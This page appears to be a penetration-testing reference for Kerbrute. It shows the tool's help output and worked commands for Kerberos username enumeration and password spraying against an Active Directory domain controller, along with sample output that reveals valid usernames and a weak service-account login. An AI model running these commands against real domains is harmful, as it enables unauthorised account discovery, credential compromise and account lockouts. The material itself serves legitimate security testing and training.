Kerbrute
This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
A list of commonly used AD usernames can be downloaded here.
Installation
Download the latest binary from GitHub.
Usage
kerbrute [command]
Flags
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 02/15/21 - Ronnie Flathers @ropnop
This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit
Flags:
--dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
--delay int Delay in millisecond between each attempt. Will always use single thread if set
-d, --domain string The full domain to use (e.g. contoso.com)
-h, --help help for kerbrute
-o, --output string File to write logs to. Optional.
--safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE
-t, --threads int Threads to use (default 10)
-v, --verbose Log failures and errors
Use "kerbrute [command] --help" for more information about a command.
Examples
Validate usernames against domain
After you have successfully enumerated usernames, you can try AS-REP roasting with Impacket's GetNPUsers.py or use CrackMapExec to do a password spray.
$ ./kerbrute userenum --dc 10.10.10.10 -d offsec.nl usersnames.txt -o userenum-output.txt
Version: v1.0.3 (9dad6e1) - 02/15/21 - Ronnie Flathers @ropnop
2021/02/15 13:22:24 > Using KDC(s):
2021/02/15 13:22:24 > 10.10.10.10:88
2021/02/15 13:22:24 > [+] VALID USERNAME: john@offsec.nl
2021/02/15 13:22:24 > [+] VALID USERNAME: jane@offsec.nl
2021/02/15 13:22:24 > [+] VALID USERNAME: johndo-adm@offsec.nl
2021/02/15 13:22:24 > [+] VALID USERNAME: janedo-adm@offsec.nl
2021/02/15 13:22:24 > Done! Tested 21 usernames (4 valid) in 0.017 seconds
To extract only the valid usernames (without the domain suffix) to a separate file, filter the log for the VALID USERNAME lines first; the summary and version lines also have a seventh field and would otherwise end up in the list.
grep 'VALID USERNAME' userenum-output.txt | awk '{print $7}' | cut -d '@' -f1 > available-users.txt
Password spray
It can be helpful to use LDAPDomainDump to gather all user account names, filter them, and use the result as input for the spray.
$ ./kerbrute passwordspray --dc 10.10.10.10 -d offsec.nl users.txt Welkom01!
Version: v1.0.3 (9dad6e1) - 02/15/21 - Ronnie Flathers @ropnop
Username as password
It can be helpful to use LDAPDomainDump to gather all user account names and use them as input for the 'user-as-pass' spray.
$ ./kerbrute passwordspray --dc 10.10.10.10 -d offsec.nl users.txt --user-as-pass
Version: v1.0.3 (9dad6e1) - 01/17/22 - Ronnie Flathers @ropnop
2022/01/17 15:35:28 > Using KDC(s):
2022/01/17 15:35:28 > 10.10.10.10:88
2022/01/17 15:35:31 > [+] VALID LOGIN: svc_dcsync@offsec.nl:svc_dcsync
2022/01/17 15:35:38 > Done! Tested 4393 logins (1 successes) in 9.460 seconds